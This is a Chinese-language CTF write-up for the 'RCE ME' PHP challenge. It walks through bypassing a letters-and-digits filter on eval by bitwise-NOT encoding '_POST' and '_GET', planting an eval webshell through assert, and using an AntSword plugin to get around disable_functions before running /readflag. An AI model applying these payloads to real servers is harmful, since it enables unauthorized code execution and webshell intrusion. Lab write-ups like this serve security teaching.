[极客大挑战 2019]RCE ME

python 复制代码
<?php
error_reporting(0);
if(isset($_GET['code'])){
            $code=$_GET['code'];
                    if(strlen($code)>40){
                                        die("This is too Long.");
                                                }
                    if(preg_match("/[A-Za-z0-9]+/",$code)){
                                        die("NO.");
                                                }
                    @eval($code);
}
else{
            highlight_file(__FILE__);
}

// ?>

这道题之前做过,命令注入,禁用了所有字母和数字,可以利用自增绕过,再做一遍。

_=(0/0)._;=_\[_\];_=++__;++;_=._;++;__++;++;_=_.__;++;_=_..__;_\[_\]($[__]);

但是长度超过40了。还有更好的办法吗?

看了一下别人的答案,可以用取反运算。

urlencode(~'_POST'); 得到%A0%AF%B0%AC%AB

然后上传code=_=\~%A0%AF%B0%AC%AB;_\[_\]($_[__]);

到服务端会自动进行url解码,得到的是不可见字符,经过取反运算后还原成_POST,就能进行命令执行。

然后尝试POST:_=system&__=ls /但是显示被禁用了。

于是通过**code=_=\~%8F%97%8F%96%91%99%90;_();**执行phpinfo():

可以看到有很多函数被禁用了,包括system

关于代码执行的一些逻辑梳理

eval(_POST\[0\])会将传入的_POST[0]字符串当作代码执行,但是如果是eval('echo 123;_POST\[0\]')就只会执行字符串'echo 123;_POST[0]',_POST\[0\]在里面只是一个变量,并不是可执行代码,只有像'echo 123;eval(_POST[0]);'才能正确植入木马。因此我们植入的木马必须是_POST\[0\](_POST[1]),该语句是动态函数调用语句,是可执行代码,这时候可以赋值0=assert,同样也会执行_POST\[1\]中表达式,只不过在较新版本php中有些限制,因此我们可以利用1=eval(_POST[3])然后蚁剑链接3即可。不能直接赋值0=eval因为eval不是函数不能用于动态函数调用。

system被禁用了怎么办呢,可以利用GET传入_=assert&__=eval($_POST[0]),然后用蚁剑链接0,这里因为有很多函数禁用(其实蚁剑的本质就是自动注入代码),我们需要下载一个插件绕过这些禁用函数。

利用echo urlencode(~'_GET');得到%A0%B8%BA%AB,然后尝试:

?code=_=\~%A0%B8%BA%AB;_\[_\](_\[__\]);\&_=assert\&__=eval(_POST[0])

可以看到成功了 。

然后用蚁剑链接,链接成功后我们可以看到根目录下的flag文件但是看不到具体内容。需要下载插件绕过禁用函数。

具体流程就是下载"绕过disable_founcs"插件然后加载插件,选择PHP7-GC-UAF模式,开始后在命令行运行/readflag就能拿到flag。

但是PHP7-GC-UAF模式是干什么的?readflag程序又是什么?

不同模式代表不同的绕过方法,可以根据phpinfo中的配置信息选择合适的模式(也可以一个个试),这里我们可以看到使用的是php7版本,所以选择PHP7-GC-UAF可以成功,当然还有其他的模式可选。

readflag是靶机设计者设置的 flag 获取入口,我们需要执行该命令以获取flag。

总结:这道题考察禁用了字母和数字的命令执行,之前使用的方法是自增绕过,但是这里限定了长度,所以只能使用另外两种方法,取反和异或。我使用的是取反,异或的原理也类似:

111^101=010相当于是取反。另外url编码是将字符的ascii码由八位二进制转换为两位十六进制数,再加上百分号。因此%FF解码后的二进制字符串就是全1的数,因此我们可以利用%FF%FF%FF%FF^%A0%B8%BA%AB得到_GET。

另外这道题涉及绕过disable_functions

disable_functions 是 PHP 配置文件(php.ini)中的一个安全设置项,用于禁止指定的 PHP 函数执行,从而限制脚本的操作权限,降低安全风险。

我使用的是最简便的方法--利用蚁剑插件。

相关推荐
zyk_computer21 小时前
Redis 实现互斥锁解决Redis击穿
java·数据库·redis·后端·缓存·性能优化·web
777sea21 小时前
NSS-DAY17 2025SWPU-NSSCTF
网络安全·ctf
m1cr0wave1 天前
[CISCN 2022 初赛]online_crt
安全·web
一只小风华~2 天前
JavaScript:Ajax(异步通信技术)
前端·javascript·ajax·web
凤年徐3 天前
解锁网页魔法:零基础HTML通关秘籍
前端·javascript·css·前端框架·html·web
编程到天明4 天前
CTF实战:用Sqlmap破解表单输入型SQL注入题(输入账号密码/username&password)
sql·网络安全·web
衍生星球4 天前
JSP 程序设计之 JSP 基础知识
java·web·jsp
一只小风华~4 天前
JavaScript 定时器
开发语言·前端·javascript·vue.js·web
YGY Webgis糕手之路5 天前
Cesium 快速入门(三)Viewer:三维场景的“外壳”
前端·经验分享·笔记·vue·web